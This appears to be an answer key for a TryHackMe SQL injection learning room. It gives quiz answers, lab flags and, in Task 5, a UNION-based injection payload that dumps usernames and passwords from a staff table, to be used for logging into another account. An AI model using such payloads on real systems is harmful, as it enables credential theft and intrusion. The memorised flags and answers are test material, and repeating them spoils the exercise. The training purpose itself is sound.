SQL Injection
(Learn about SQL injection from Here)
Task 1 - Brief
Q1. What does SQL stand for?
Answer - Structured Query Language
Task 2 - What is a Database?
Q2. What is the acronym for the software that controls a database?
Answer - DBMS
Q3. What is the name of the grid-like structure which holds the data?
Answer - table
Task 3 - What is SQL?
Q1. What SQL statement is used to retrieve data?
Answer - SELECT
Q2. What SQL clause can be used to retrieve data from multiple tables?
Answer - UNION
Q3. What SQL statement is used to add data?
Answer - INSERT
Task 4 - What is SQL Injection?
Q1. What character signifies the end of an SQL query?
Answer - ;
Task 5 - In-Band SQLi
Q1. What is the flag after completing level 1?
0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR '<br>') FROM staff_users
It will give you the credentials. Log in to martin's account and get the flag.
Answer - THM{SQL_INJECTION_3840}
Task 6 - Blind SQLi - Authentication Bypass
Q1. What is the flag after completing level two? (and moving to level 3)
Answer - THM{SQL_INJECTION_9581}
Task 7 - Blind SQLi - Boolean Based
Q1. What is the flag after completing level three?
Answer - THM{SQL_INJECTION_1093}
Task 8 - Blind SQLi - Time Based
Q1. What is the final flag after completing level four?
Answer - THM{SQL_INJECTION_MASTER}
Task 9 - Out-of-Band SQLi
Q1. Name a protocol beginning with D that can be used to exfiltrate data from a database.
Answer - DNS
Task 9 - Remediation
Q1. Name a method of protecting yourself from an SQL Injection exploit.
Answer - Prepared Statements